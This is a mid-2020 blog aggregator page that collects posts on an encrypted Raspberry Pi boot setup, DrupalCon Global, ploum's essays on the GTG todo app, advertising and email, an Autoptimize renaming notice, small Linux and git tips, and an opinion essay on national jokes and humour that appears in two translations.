[root@vicky manjaro]#  mount | grep -i chroot | awk '{print $3}' | xargs -n1 umount 
umount: /mnt/chroot: target is busy.
[root@vicky manjaro]#  mount | grep -i chroot | awk '{print $3}' | xargs -n1 umount 
[root@vicky manjaro]# 

Close the luks volume…

[root@vicky ~]# cryptsetup luksClose cryptroot
[root@vicky ~]# sync
[root@vicky ~]# 


Connect the USB disk to the Raspberry Pi and power it on. If all goes well, the Pi will boot from the USB device and ask for the passphrase to decrypt the root filesystem.

Have fun!


July 10, 2020

I remember the first gathering of Drupal contributors back in 2005. At the time, there were less than 50 people in attendance. In the 15 years since that first gathering, DrupalCon has become the heartbeat of the Drupal community. With each new DrupalCon, we introduce new people to our community, demonstrate the best that Drupal has to offer, and reconnect with our Drupal family.

Next week's DrupalCon Global is going to be no different.

Because of COVID-19, it is the first DrupalCon that will be 100% virtual. But as much as we may miss seeing each other in person, the switch to virtual has opened opportunities to bring in speakers and attendees who never would have been able to attend otherwise.

There are a few moments I'm particularly excited about:

  • Mitchell Baker, CEO and Chair of the Mozilla Foundation, is joining us to talk about the future of the Open Web, and the importance of Open Source software.
  • Jacqueline Gibson, Digital Equity Advocate and Software Engineer from Microsoft, will be talking about Digital Inequity for the Black community – a topic I believe is deeply important for our community and the world.
  • Leaders of current Drupal strategic initiatives will be presenting their progress and their calls for action to keep Drupal the leading CMS on the web.
  • And of course, I'll be giving my keynote presentation to celebrate the community's accomplishment in releasing Drupal 9, and to talk about Drupal's future.

Beyond the sessions, I look forward to the human element of the conference. The side conversations and reunions with old friends make attending DrupalCon so much more powerful than simply watching the recordings after the fact. I hope to see you at DrupalCon Global next week!

July 09, 2020

In the last two weeks, Peter Zaitsev published a 4-part series on measuring Linux performance on this blog.

July 08, 2020

This post is the last part in a four-part blog series by Peter Zaitsev, Percona Chief Executive Officer.

July 07, 2020

How a broken screen kicked me out of developing an Open Source project and how the community revived it 6 years later

When I discovered the FLOSS world, at the dawn of this century, I thought developers were superheroes. Sort of semi-gods who achieved everything I wanted to do with my life, like having their face displayed on a planet, their name on the Wikipedia page describing their software, or launching a free software company sold for millions. (Spoiler: I didn’t achieve the latter.) I was excited like a groupie when I could have a casual chat with Federico Mena Quintero or hang out with Michael Meeks.

I never understood why some successful developers suddenly disappeared and left their software unmaintained. I was shocked that some of them started to contribute to proprietary software. They had everything!

Without surprise, I followed that exact same path myself a few years later, without premeditation. All it took was for my laptop’s screen to break while I was giving a conference about, note the irony, Free Software.

But let’s tell things in order.

Starting a FLOSS project

As a young R&D engineer in my mid-twenties, I quickly discovered the need for an organisational system in order to get things done. Inspired by the Getting Things Done book, I designed my own system but found no software to implement it properly. Most todo software was either too simplistic (useful only for groceries) or too complex (entering a task required filling in tens of fields in an awful interface). To some extent, this is still the case today. No software managed to be simple and yet powerful, allowing you to take notes with your todos, to have a start date before which it would make no sense to work on the task, or to have dependencies between tasks.

I decided to write my own software and convinced my lifelong friend Bertrand to join me. In the summer of 2009, we spent several days in his room drawing mockups on a white board. We wanted to get the UX right before any coding.

Long story short: it looks like we made the right choices, and Getting Things GNOME! (yep, that was the name) quickly became popular. It was regularly cited in multiple Top 10 Ubuntu apps lists and was widely popular in the Ubuntu app store. We even had many non-Linux users trying to port it to Windows because there was no equivalent. For the next four years, I would spend my nights coding, refactoring, developing and building a community.

The project started to attract lots of contributors and some of them, like Izidor and Parin, became friends. It was a beautiful experience. Last but not least, I switched to a day job which involved managing free software development with a team of rock-star developers. I was literally paid to attend FOSDEM or GUADEC and to work with colleagues I appreciated. And, yes, my head was on planet.gnome and GTG had its own Wikipedia page.

The great stall

Unfortunately, 2014 started with a lay-off at Lanedo, the company I was working for. I started being involved in the local startup scene. I was also giving conferences about Free Software. During one of them, the screen of my laptop suddenly stopped working. I was able to finish thanks to the projector, but my laptop now required an external screen.

Being broke and jobless, I bought the cheapest laptop I could find. A Chromebook. With the Chromebook, I started investigating web services.

This is perhaps one of my biggest regrets: not having developed GTG as a webapp. If I had, things would probably have been very different. But I didn’t like web development. And still don’t like it today. In the end, it was not possible to code for GTG on the Chromebook.

After a few months, I landed a job at Elium. My friend and CEO Antoine convinced me to try a company Macbook instead of a Linux laptop. I agreed to do the test and started to dive into the Apple world.

I never found a todo app that was as good as GTG, so I started to try every new shiny (and expensive) thing. I used Evernote, Todoist, Things and many others. I wanted to be productive on my Mac. The Mac App Store helped by showering me in recommendations and new arrivals of fantastic productivity apps.

I didn’t want to acknowledge it but, in fact, I had suddenly abandoned GTG. I didn’t even have a working Linux computer.

I was not worried because there were many very skilled and motivated contributors, the main one being Izidor. What I didn’t imagine at the time was that Izidor would go from being a bored student to a full-time Google employee with a real life outside free software.

A Free Software project needs more than developers. There’s a strong need for a « community animator »: someone who will take decisions, who will communicate and be the heartbeat of the project. It’s a role that often goes unnoticed when done by the lead dev. I was always the main animator behind GTG, even at times when I was writing less code than other contributors. Something I didn’t realise at the time.

And while I spent 6 years exploring productivity on a Mac, GTG entered hibernation.


Users were not happy. Especially one: Jeff, who was also a community contributor and is an open source expert. In 2019, he decided to bring GTG back from the grave. Spoiler: he managed to do it. He became the heartbeat of GTG while a talented and motivated developer answered his call: Diego.

They managed to do an incredible amount of work and to release GTG 0.4. Long live them! Video of GTG 0.4.

I didn’t write any code but helped as I could with my advice and my explanations of the code. It’s a strange feeling to see your own creation continuing in the hands of others. It makes me proud. Creating software from scratch is hard. But living to see your software being developed by others is quite an accomplishment. I’m proud of what Diego and Jeff are doing. This is something unique to Open Source and I’m grateful to live it.

What is funny is that, at the same time Jeff called for a reboot of GTG, I went back to Linux, tired of all the bells and whistles of Apple. I was looking for simplicity, minimalism. It was also important for me to listen again to my moral values. I was missing free software.

In hindsight, I realise how foolish my quest for productivity was. I had spent 6 years developing a piece of software to make me more productive. When I realised that and swore not to develop productivity software anymore, I spent the next 6 years trying every new productivity gadget in order to find the perfect combo.

It was enough. Instead of trying to find tools to be productive, I decided to simply do what I always wanted to do. Write.

Changing my perspective led me to the awful realisation that people are not using tools because they are useful but because they are trendy. They rationalise afterwards why they use the tool, but tools are not made to fill real needs. Needs are, instead, created to justify the use of a fun tool. A few years ago, creating a project was all about « let’s create a Slack about the subject ». Last year it was Notion. This year it’s Airtable. When you have a hammer, everything looks like a nail.

After so many years developing and testing every productivity software out there, I can assure you that the best productivity system should, at the very least, not depend on a complex app to access your data. By using Markdown files in a very simple and effective folder structure, I’m able to have the most productive system I ever had. A system that could have worked 12 years ago, a system that does not depend on a company or an open source developer. I don’t even need GTG nor GNOME anymore. I’m now working fully in Zettlr on Regolith, with a pen and a Moleskine. I’m now able to focus on a couple of big projects at a time.

Jeff would probably say that I evolved from a chaos warrior to a « goldsmith ». At least for the professional part, because I can assure you the parenting part is still fully on the chaos side. Nevertheless, Jeff’s dedication demonstrated that, with GTG, we created a tool which can become an essential part of a chaos warrior’s productivity system. A tool which is useful without being trendy, even years after it was designed. A tool that people still want to use. A tool that they can adapt and modernise.

This is something incredible that can only happen with Open Source.

Thanks Bertrand, Izidor, Parin, Jeff, Diego and all the contributors for the ride. I’m sorry to have been one of those « floss maintainers that disappear suddenly » but proud to have been part of this adventure and incredibly happy to see that the story continues. Long live Getting Things GNOME!

Photo by krisna iv on Unsplash.

I am @ploum, an electronic writer. If you enjoyed this text, feel free to support me on Paypal or in millibitcoins 34pp7LupBF7rkz797ovgBTbqcLevuze7LF. Your regular support, even symbolic, is a real motivation and recognition. Thank you!

This text is published under the CC-By BE licence.

July 06, 2020

Advertising is not so bad. Sometimes it acts. With its own ethics, it is true.

If it fought for decades to prevent bans on promoting cigarettes or alcohol, if it still wants to make us buy big SUVs while feeding our children cans of soda and sugary bars, it chooses its battles.

Numerama reports that an advert for electric bikes was apparently censored because it might imply that cars pollute. Advertising chooses its battles.

But rest assured, your brain will soon forget it.

Because in order to read that article, Numerama will first force you to watch an advert for an SUV.

The next time you wonder why nothing is being done about global warming, remember this anecdote. Remember that everything connected, closely or remotely, to advertising is guilty. That even adverts for electric bikes will not save us! Advertising is the opposite of education. It reshapes our brains to make them receptive to simplistic messages. The success of anti-vaxxers, or of those who believe the earth is flat? Brains that have spent years learning, above all, not to think.

Advertising is everywhere! Even along motor-racing circuits (although at the speed they drive, I doubt the drivers have time to read it).

Everyone is guilty: the advertisers, the sponsors, the media, the platforms, and all those who watch ads without actively trying to protect themselves from them.

What? That does not leave many people?

That is precisely the problem…

Photo by Ploum on Unsplash. Screenshot contributed by Ledub.


As of the soon-to-be-released Autoptimize 2.7.4, all occurrences of “blacklist” and “whitelist” in the code will be changed into “blocklist” and “allowlist”. There is no impact for users of Autoptimize, everything will work as before.

If however you are using Autoptimize’s API, there are two (to my knowledge rarely used) filters that are now deprecated and will be removed at a later stage. `autoptimize_filter_js_whitelist` and `autoptimize_filter_css_whitelist` still work in 2.7.4, but if you’re using them, switch to `autoptimize_filter_js_allowlist` and `autoptimize_filter_css_allowlist` to avoid problems when they are removed in the release after 2.7.4.

Small post-publishing clarification dd. 22/07/2020: this post is just an announcement, I feel no urge to discuss the change and am not really interested in arguments pro or contra. Don’t fret over this change, fretting is useless, instead enjoy the summer, kiss your lover, read a good book, … :-)

This post is the third in a four-part blog series by Peter Zaitsev, Percona Chief Executive Officer.

July 04, 2020

Impressed by Ilja Leonard Pfeijffer’s columns about Corona in Genoa, I read his masterful “Grand Hotel Europa” during our holiday: about love, an old hotel in full transformation, the adventurous (and violent) life of Caravaggio, the genius of Damien Hirst, and above all about how Europe is bit by bit becoming an amusement park for tourists (Venice, but closer to home also Amsterdam, or our very own Bruges?) while we stare blindly at our own grand cultural heritage without quite knowing what it entails.

Admittedly, Ilja sometimes lost me when he went into, say, cultural-philosophical questions, but that was amply compensated by a strong central thread and a healthy dose of self-mockery. Highly recommended!

After a difficult period in which I myself experienced anxiety, I thought to myself a few hours ago:

Nothing turns out to be harder than accepting that there is no danger.

I have decided that this will become the new undertone of this blog. What does that mean exactly? That some ten of the coming blog posts will keep it as their through-line.

“Clowns to the left of me are prevaricating” (a reference, of course, to the song featured in Reservoir Dogs) is history.

What was the previous one? Back then I probably didn’t think about it this hard. Maybe I’d better not do so now either? I think too much about pretty much everything.

So, hence the new subtitle:

Accept that there is no danger.

I have made it Dutch. Because the only groups interested in my blog are a) you, or b) perhaps State Security. In that case the latter has a budget to get things translated, and you already speak Dutch.

Well, yes. There is some danger, of course. But we actually have it rather well under control.

July 03, 2020

July 02, 2020

This post is the second in a four-part blog series by Peter Zaitsev, Percona Chief Executive Officer.

June 30, 2020

I caught myself sending a long email to someone I have been following for several years on social networks. I took the time to write that email. To reread it. To correct it. To refine it. In it I express a simple idea that I could have sent to them on Twitter, whether by mentioning them or in a private message. I tell them, quite simply, that I no longer wish to interact on Twitter.

Taking the time, thinking, rereading myself gave me enormous pleasure. I had the feeling of having brought a little something to the world: a clarification of my ideas, an outstretched hand, a shared avenue of thought. I had built something intimate, in which I reveal myself.

In trying to regain control of my brain, I rediscovered, without meaning to, the old-fashioned art of the epistolary relationship.

We have forgotten the importance and the ease of email. We have forgotten it because we have not taken care of it. We let our mailbox rot under thousands of unsolicited messages, we deliberately perfect the art of filling our inboxes with useless, uninteresting, boring emails, without ever taking the time any more to place a useful, crafted, intimate letter there.

We believe email is boring, when it is our thoughts that are obscurely barren. “What is well conceived is clearly expressed, and the words to say it come easily,” said Boileau. It has to be said that our brains are now infernal jumbles besieged by countless attempts to fill them again and again. Anaesthetised by the quantity of information, we find no way out but consumption.

Wanting to cure my Twitter addiction, I had decided to follow only a few selected accounts in my RSS reader, through the Nitter interface. Within a few weeks, a cold truth forced itself on me: nothing was interesting. We post emptiness, noise. Once the enticing features, the notifications and the comments are stripped away, the raw content turns out to be miserable and sickly. Yet I had selected the Twitter accounts of people who were, by my criteria, particularly interesting and intelligent. Alas! We all wallow in the same mire of indignation at highly targeted news, the whole thing sprinkled with self-congratulation. Reduced to a few characters, even the most enriching idea turns into predigested mush designed to populate a hypnotic, endless scroll.

One evening, while using my shower to work out a theoretical concept that was occupying my mind, I realised with horror that I was thinking in Twitter threads. My mind was dividing my idea into blocks of 280 characters. To make it more digestible, more popular. I was spontaneously optimising certain sentences to make them more “retweetable”.

In exchange for content of wretched quality, Twitter was deforming my thoughts to the point of turning my aquatic evening meditation into a semi-conscious quest for petty glory and instant approval. The price paid is unimaginable, exorbitant.

Having blocked all news sites ages ago, I decided that Twitter and Mastodon would go on the same diet as Facebook and LinkedIn: follow no one. I now feed my serendipity with longer writings, thanks to the ancient voodoo magic of RSS.

Freed and aired, the brain suddenly recovers suppleness and range. Through a joke on a forum I follow, I gather that a politician has been put in prison. The information assaults me. It occupies an undeserved place in my brain. I did not want to know this useless artefact, which will soon be erased from public consciousness. Like an ex-smoker suddenly allergic to smoke, my brain can no longer bear the pseudo-informational refuse we are fed through every pore, every screen, every conversation.

Once rid of this crust of filth, I catch myself thinking. My fingers catch themselves wanting to write rather than refresh a page and react with a prefabricated emotion. Instead of a public display of my egotistical pride dressed up as a substitute for communication, I want to forge texts and stories, to pass on information in a wider context, to give it the time to exist in the minds of its recipients. And never mind if those recipients are fewer, and less inclined to inject me with their dopamine-laden likes.

In front of my letterbox, immaculate thanks to strict observance of my inbox-zero and unsubscribe rules, I will watch for the reply like a teenager waiting for the postman to hand him a perfumed envelope. And if it does not come, my life will go on without my being obsessed by a counter of views, likes or shares.

The decentralised communication tool of web 5.0, 6.0 and 12000.0 already exists. It is email. We simply have not yet really learned to use it. We try in vain to replace or improve it with great flourishes of interfaces and multicoloured features, because it exposes the vacuity of our interactions. It lays bare that we ought to make an effort, to change our brain and our will. As long as we persist in producing and consuming as much noise as possible in insatiable gluttony, as long as we measure our success with autocratic statistics, no system will allow us to communicate. Because that is not what we are looking for. Because we have lost ourselves in appearance and quantity, throwing the very idea of quality into oblivion. We criticise the weak-mindedness and short-termism of our politicians without realising that we are mocking our own reflection.

When we are mature enough simply to want to exchange quality information, we will discover that the solution was right before our eyes. So simple, so beautiful, so elegant, so decentralised.


Photo by Matt Artz on Unsplash

Je suis @ploum, écrivain électronique. Si vous avez apprécié ce texte, n'hésitez pas à me soutenir sur Paypal ou en millibitcoins 34pp7LupBF7rkz797ovgBTbqcLevuze7LF. Vos soutiens réguliers, même symboliques, sont une réelle motivation et reconnaissance. Merci !

Ce texte est publié sous la licence CC-By BE.

Here are the steps needed to add a new SWAP partition to your Linux machine. This’ll allocate 2GB of space on your disk, and allow it to be used as RAM if your server is running low.
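The steps themselves are not shown in this excerpt. As a minimal sketch of the usual recipe (the 2 GB size matches the post; the file path, and the use of a swap file rather than a dedicated partition, are assumptions on my part):

```shell
# Sketch only: create and format a 2 GB swap file.
# Path and size are illustrative; activating it (swapon) requires root.
set -e
SWAPFILE="${SWAPFILE:-./swapfile}"

fallocate -l 2G "$SWAPFILE"   # reserve 2 GB of disk space
chmod 600 "$SWAPFILE"         # swap must not be readable by other users
mkswap "$SWAPFILE"            # write the swap signature

# As root, enable it now and make it survive reboots:
#   swapon "$SWAPFILE"
#   echo "$SWAPFILE none swap sw 0 0" >> /etc/fstab
```

Once enabled, `swapon --show` or `free -h` should list the new swap space.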

June 29, 2020

This post is the first in a four-part blog series by Peter Zaitsev, Percona Chief Executive Officer.
Quick tip if you want to skip the pre-commit validations and quickly want to get a commit out there.
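The actual command isn't shown in this excerpt; presumably it refers to Git's `--no-verify` flag, which skips the pre-commit and commit-msg hooks for a single commit. A quick demo in a throwaway repo (paths and messages are illustrative):

```shell
# Demo: a pre-commit hook that always fails, bypassed with --no-verify.
set -e
repo=$(mktemp -d)
cd "$repo"
git init -q
git config user.email demo@example.com
git config user.name Demo

# Install a hook that rejects every commit.
printf '#!/bin/sh\nexit 1\n' > .git/hooks/pre-commit
chmod +x .git/hooks/pre-commit

echo hello > file.txt
git add file.txt
git commit -m "normal" && echo "unexpected" || echo "hook blocked the commit"

# --no-verify (short form: -n) skips the pre-commit and commit-msg hooks.
git commit --no-verify -m "bypassed hook"
git log --oneline
```

Use sparingly: skipped validations still run in CI, so this only postpones the feedback.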

June 27, 2020

Cover Image - Chad and Virgin Laughing
"A sense of humour is a reflection of a sense of proportion. It occurs when the wiser part of ourselves short-circuits a closed system of thought."

When I was little, laughing at our international neighbors was the most normal thing in Europe. We were unofficial rivals, sometimes mutually, sometimes one-way, following the cultural and historical stereotypes of the time.

The 'Hollanders' joked about us:

A Belgian construction worker is helping out across the border in the Netherlands, and sees a Dutchman pour coffee from his thermos.

"What's that?" he asks.
"That's a thermos! If you pour something hot into it, it stays hot. If you pour something cold into it, it stays cold."
"Genius! How much do you want for it?"
"It's yours for 25 guilders."

The next day he's back at work in Belgium and proudly shows his new find to his colleagues.

"That's a thermos! If you pour something hot into it, it stays hot. If you pour something cold into it, it stays cold."
"Wow! And how does that thing know?"

Naturally, we told jokes about them too:

A bus with 50 Dutch vacationers is driving down to the Costa del Sol and stops at a gas station in Belgium.

The driver asks the attendant: "Could I get a bucket of water? My engine can't handle this heat!"

"No problem!" He disappears and returns with a big sloshing bucket.

"And uh... would you happen to have 51 straws?"

Because Belgians (read: Flemings) were dumb, and the Dutch were stingy. These are actually much cleaner jokes than the ones we told, which included:

"How many times does a Dutchman use a condom?"
"Three times. Once the normal way, once inside out, and the third time as chewing gum."

(This was still in primary school, FYI.)

But the joke has a karmic reversal:

"How many times does a Belgian laugh at a joke?"
"Three times. Once when you tell it, once when you explain it, and the third time when he gets it."

Asterix and Obélix - Map of Gaul

Europa Universalis

A quick Google search shows that the basic jokes about nationality are extremely pro forma. You can largely just swap or change the countries and arrive at another joke that has also been told some place, some time. Like this classic joke about the train tunnel:

A nun, an attractive blonde, a German and a Dutchman are sitting together in a train compartment. The train enters a tunnel, it's pitch dark, and suddenly there's a slap. When the train rides back into the light, the German is rubbing his face in pain.

The nun thinks: "The German probably touched the lady, and she rightly rapped him on the knuckles."

The lady thinks: "That German pig tried to grope me, but got the nun by accident. Good thing she slapped him."

The German thinks: "That Dutchman probably couldn't keep his hands to himself, but the blonde thought it was me. The bastard!"

The Dutchman thinks: "Next tunnel, I'm slapping that filthy German again!"

The countries are close neighbors, so there's always some stereotypical, historical beef. If you change the countries, the joke can also flip, depending on what your prejudices are.

If the Dutchman is the aggressor, you might think it's payback for German aggression against the Netherlands. If you tell a version where the German slaps the Dutchman, that might represent unilateral German aggression. The reason the joke is told with nationalities is also why it features a nun and an attractive blonde: it adds the necessary color, so the characters (and the audience) can instantly draw all sorts of wrong conclusions.

You think the nationalities matter, but that is never actually stated. It's misdirection, to draw you in. The real punchline is that you don't need a complicated explanation for an outright attack. A joke about national aggression can expose universal themes, through its 4 contradictory perspectives, which also touch all sorts of other sensitive nerves.

You do have to keep in mind that the Europe in which such jokes were routinely told was completely different from today. The hint is in the "25 guilders" in the first joke. This was before the Euro, before the customs union, the Schengen zone, and modern electric trains to tie it all neatly together. You only had to drive a few hours in any direction to find a place where you needed permission to enter, where you didn't speak the language, didn't know what things cost, didn't know the local laws, and couldn't deal with the authorities on an equal footing. These were also the same people whose ancestors had spent centuries slaughtering your ancestors... but they seemed mostly okay now, right?

If you live in a situation like that, it's perfectly normal to trivialize it all and crack jokes about it. To pretend it's all far from your bed. To say: if we're all going to be characters in a drama none of us really has much say in, we might as well have some fun with it. Some of these jokes do capture an immense amount of historical and cultural context, for example:

In heaven the police are British, the chefs French, the mechanics German, the lovers Italian, and it's all organized by the Swiss.

In hell the chefs are British, the mechanics French, the lovers Swiss, the police German, and it's all organized by the Italians.

That's a spicy summary of about 150 million people over a period of at least a century. Those who told such jokes didn't do it out of hate. When a Mysterious Stranger actually walked into our little town, most of us were mainly very curious and friendly. You also didn't share them unless you were already on good terms (or decidedly not), and could drop the pretense. The main audience was our own tribe, and the goal was precisely to contain the collective unease and fear of the foreign. When you tell someone a joke about them, you reveal something very intimate.

With the Belgians and the Dutch you don't have to look far. Our fear was that they would outcompete us with their superior business sense. Their fear was that they would lose to a people they considered unworthy.

These are universal themes.

Speak Easy

Getting to hear someone speak without a filter, humorously or not, is incredibly valuable. And I don't mean so you can mine their quotes to paint them black.

A long time ago, I was at the house of new friends who didn't yet know I was gay. They were laughing about their gay housemate. The guy regularly used enormous amounts of toilet paper, which they were trying to explain by connecting it to his presumed sexual activities through the back door. I didn't say anything, and certainly didn't feel like an instant "coming out". I just laughed along, and the conversation moved on.

These days, some would say this was undoubtedly homophobic. That such humor is bigoted and degrades the dignity of its target. That such material must be stamped with all sorts of warnings, and that those who speak freely about it should apologize and do penance. That it is not only appropriate but our moral duty to intervene (and conveniently make it all about me in the process).

I, on the other hand, knew these guys were joking precisely because they didn't dare bring it up with the young man in question. You don't just casually chat about someone else's toilet habits. Once you make that connection between humor and taboo, it's really not so surprising that potty humor exists.

I also think that if they had known I was gay, they wouldn't have made those allusions, or would have been ashamed of them afterwards, and then it would have been an Awkward Situation. Instead, they could raise a difficult question about someone they lived with, and make it legible. I could simply remain "one of the guys" by grasping the rules, context and intent. If I want that today, all I have to do is say something funny and crude about gay people behind closed doors, to show that it needn't be a dangerous minefield.

This is how the LGBT world has handled it for decades. Drag queens, for example, use their humor and mockery as armor, but it's only complete if you can also laugh at yourself. The Adventures of Priscilla: Queen of the Desert (1994) captured this beautifully:

So I fully recognize myself in that John Cleese quote about how a wiser part of ourselves can short-circuit a closed system of thought.

It also underlines that humor is completely contextual, because the whole point is to dance on the edge of what you may say and think. If something is taboo, if something is closed-minded, that's what comedy chases hardest.

As an example, take two scenes, two years apart. First, the opening of American Pie (1999):

The lead character is caught by his conservative parents while jerking off and trying to watch illegal TV porn. The scene is played mostly straight. This was fairly naughty in its own time, as a mainstream American movie, and reflected the Christian taboos around teenage sex. Especially when you know that the American Pie of the title also loses its virginity. It was so memorable that the New York Times published an opinion piece about it 20 years later. If anyone was offended by it back then, it was mostly people who resembled the parents, who couldn't think or talk about sex without blushing.

Today, however, it's mostly people from the political opposite side who would find this movie crude and offensive. The reasons cited are the sexism, the gay jokes, and so on. If you believe the press there are plenty of malcontents, but really I think they just wanted an excuse to post a clip of a guy pretending to fuck an apple pie.

Much more interesting is how this scene was parodied in Not Another Teen Movie (2001). There's a lot to say about that movie, because it masterfully stitches together all sorts of 80s and 90s teen-movie clichés. It refuses to take itself seriously precisely by taking the source material very seriously, with stellar performances. It opens with a direct homage to American Pie, except every aspect of that scene has been blown up to absurd proportions:

It makes perfect sense once you understand that teenage sex and hormonal urges were highly controversial at the time. Instead of a shy guy with a sock, we get a fearless young lady with her XXL pink vibrator with little flowers on it. Everyone walks into the room, even grandma and the pastor. It ends with a whipped-cream bukkake, cueing the opening titles. And the movie just keeps going like that, cleverly remixing its source material with an oversized dose of potty, sex and other humor. It mostly succeeds, with only a few missteps, like the joke about the Token Black Character that gets stretched across the entire movie.

If you thought the target was women, or LGBTs, or black people, you missed the point entirely. This was a big middle finger aimed at puritanical moral crusaders, the same people who were then also getting worked up over a pair of blue breasts in profile, in a video game they had never played themselves.

In any case, the target audience found the movie hilarious, which is of course what matters most.

The Humorton Window

I've mostly used examples that now seem dated, and even provincial.

Jokes about international rivals have largely disappeared, because we now know far more about each other. Thanks to open borders and a harmonized economy and legal codes, we have a legible continent where everyone can easily compare notes. We no longer need to joke about which country runs best; we can just go look at the COVID numbers together.

Today you'll mostly encounter such humor in the context of an April Fools joke or "shitposting", like these two memes:

G E K O L O N I Z E E R D (Colonized)
G E F E D E R A L I Z E E R D (Federalized)

Usually posted by a Dutchman or a Belgian respectively, referring to the Dutch talent for imperialism and the Belgian talent for unnecessary bureaucracy. It signals that a given discussion or space is populated mostly by Dutchmen or Belgians. But it should really only be used ironically, because otherwise it's just tiresome.jpg.

Sexual humor has also largely diminished, because the internet gives us pornography and genuine sex ed in abundance, and the basic taboos have disappeared. Instead of a group of students all wondering how gay people actually do it, you have a bunch of guys who looked at it once, didn't care for it, and never thought about it again.

So the space of acceptable and popular jokes is continuously evolving. There's also a saying: "To learn who rules over you, simply find out who you are not allowed to criticize." This counts doubly so for "...or joke about."

This is commonly and falsely attributed to Voltaire, but oddly enough it appears to come from a 1993 essay written by an actual, genuine, bona fide white nationalist. TIL.

It obviously doesn't matter who said it, only whether it's true. People readily say it can't be true, because for example you're not allowed to mock the mentally disabled, who certainly can't defend themselves. But that doesn't hold up, because such mockery naturally draws a response from those who do have the power to punish people, namely the various organizations that ostensibly advance the rights of particular groups.

The problem with this is that the system is driven by attention, not by results. The essay The Toxoplasma of Rage describes this in detail, written by recently unmasked blogger Scott Alexander Ocasio-Cortez. When the choices that are rewarded most are exactly the ones that draw the most attention, you often amplify the tension between different groups instead of reducing it, and breed more resentment.

It also confuses those who can already get help with those who still need it. As an example, something that happened here a while ago: an elderly Jewish woman called an on-call nursing service (if I remember correctly). When the nurse heard she was Jewish, she was berated with all of Israel's collective sins against Palestine, and treated rudely and unhelpfully. I only know about it because it was in all the papers the next day, after a pro-Jewish organization raised the issue.

It would have gone very differently if it had been, say, a homeless person or a drug addict who was treated immorally. It would be practically impossible for someone like that to get recognition that way, let alone compensation. Whether you want to call that "ruling" or not, these are two completely different levels of access and service, and the only difference is which groups of people you are or aren't allowed to generalize about.

Another argument against not-Voltaire is comedians like Dave Chappelle or Bill Burr, who were both critical of "cancel culture" and so-called "alphabet people" (LGBTQIAA2+). They seemingly invited their own downfall, but instead reaped enormous success. Ricky Gervais' near-annual speeches at the Golden Globes are similar. Every time, he says he'll never be invited back, while thoroughly roasting a room full of enormously rich people:

These comedians are effectively untouchable; their careers and lifestyles are not at stake. They are multi-millionaires with successful projects on their résumés. That's exactly why they can pull it off. Those without "fuck you money" and a pair of steel balls make themselves a target by telling such jokes. And there are people with the motivation and the means to answer them. The saying is about "who rules over you", not over them.


I find this endlessly fascinating, because it turns humor into a kind of "Romulan Neutral Zone" at the edge of the ordinary political Overton Window. This zone is larger, covering not only what is acceptable but also what is contested. The jokes are the bullets, but the armor is confidence, drawn from skill and success. Comedians play this game every show night on Nightmare difficulty.

The zone covers exactly those ideas that humor can actually work on. Humor alters or refutes our worldview with concentrated salvos of hidden wisdom or surrealism. But the knot has to be accessible enough to untangle. Humor's reach is bounded by its own rules, like "Too Soon", "That's NOT funny", "Express Elevator To Hell If I Laugh" or "I Don't Get It". These are highly subjective boundaries, continuously negotiated between the teller and the audience. If you don't believe me, take the joke about the 51 straws, but replace "Dutch" with "Jewish".

If you conclude that the Jews therefore rule over you, you're not looking at how these things actually play out. Because what really rules over you is the chronic, uncalibrated fear of not being in on the joke, which shows itself in all sorts of forms. This probably also explains why you have to make people laugh if you want to tell them something they don't want to hear, because otherwise they'll lynch you. Good humor is a successful mental defense against a train of thought that has become too rigid and dogmatic.

The story of Mark Meechan is very relevant here. He's the Scot who was convicted of "grossly offensive" behavior for teaching his dog to do a Hitler salute when he said "Gas the Jews". He has always said he did it purely to annoy his girlfriend. The "due process" in this case held that "context and intent" were officially irrelevant to such facts, which is of course an atomic bomb of a precedent. But it gets more absurd: in a BBC documentary about the affair, one of his critics asks his own cat "Gas The Jews?", and the cat naturally says no "because he was raised well". By the logic of the British court's ruling, that man is guilty of exactly the same crime, and the video is all the evidence needed.

They saw someone making jokes they found offensive, and thought this posed a real threat to their society. In their panic, they then started tearing down one of the necessary foundations of that society. And they're still at it.

It's all one big joke, but the penny hasn't dropped for them yet.

* * *

Humor is not just some random evolutionary tic, or a meaningless pastime. It is a fundamental mechanism we use, both individually and collectively, to sanity-check our reasoning. Humor highlights exactly the boundaries where we might be getting it wrong, and helps break through fixations and taboos.

We find something funny when it sends us surprising and contradictory signals, all at once. If we can work them out quickly and correctly, and place them in the wider world, we can learn something new and true. It also means that when the humor police show up, that is a symptom of a collective lack of understanding, and of taboos that cannot be discussed.

Banning fun and mockery means banning challenging insights, and we do so at our own peril.

Cover Image - Chad and Virgin Laughing
"A sense of humour is a reflection of a sense of proportion. It occurs when the wiser part of ourselves short-circuits a closed system of thought."

When I was a kid, mocking your international neighbors was the normal thing to do in Europe. More than that, there were unofficial rivalries, sometimes mutual, sometimes one-way, embodying the cultural and historical stereotypes of the time.

The Dutch told jokes like this about us:

A Belgian construction worker is helping out across the border in the Netherlands, and sees a Dutchman pour coffee from his thermos.

"What's that?" he asks.
"It's a thermos! If you put hot things in it, they stay hot. If you put cold things in it, they stay cold."
"That's amazing! How much do you want for it?"
"It's yours for 25 guilders."
"I'll take it!"

The next day he's back in Belgium and proudly shows off his new find during lunch.

"It's a thermos! I got it from the Netherlands! If you put hot things in it, they stay hot. If you put cold things in it, they stay cold."
"Wow, that's amazing! How does it know?"

In turn, we told jokes about them:

A bus with 50 jolly Dutch vacationers is driving down to the Spanish coast, and stops by a gas station in Belgium.

The driver asks the attendant: "Could I get a bucket of water? My engine is having some trouble with this blistering heat!"

"No problem at all!" He goes out back and returns with a big sloshing bucket.

"Also... do you happen to have 51 straws?"

It's not very complicated. Belgians were dumb, and the Dutch were stingy. These are actually much cleaner jokes than the ones we told, because that included:

"How many times does a Dutchman use a condom?"
"Three times. Once the normal way, once inside out, and the third time as chewing gum."

(This was still in primary school, by the way.)

But this joke has a karmic reverse:

"How many times does a Belgian laugh at a joke?"
"Three times. Once when you tell it, once when you explain it, and the third time when he gets it."

Asterix and Obélix - Map of Gaul

Europa Universalis

A casual search will show that the basic jokes about nationality are so scripted, that you can pretty much substitute any country for any other, and arrive at a joke that has been told some place some time. Like this classic train tunnel joke:

A nun, an attractive blonde, a German and a Dutchman are sitting in a train compartment. The train enters a tunnel, it's completely dark, and suddenly there's a slap. When the train comes out of the tunnel, the German is rubbing his face in pain.

The nun's thinking: "The German man probably touched the blonde woman and she slapped him, and rightfully so."

The blonde's thinking: "That German pervert probably tried to grope me, but got the nun instead, and she slapped him. Good."

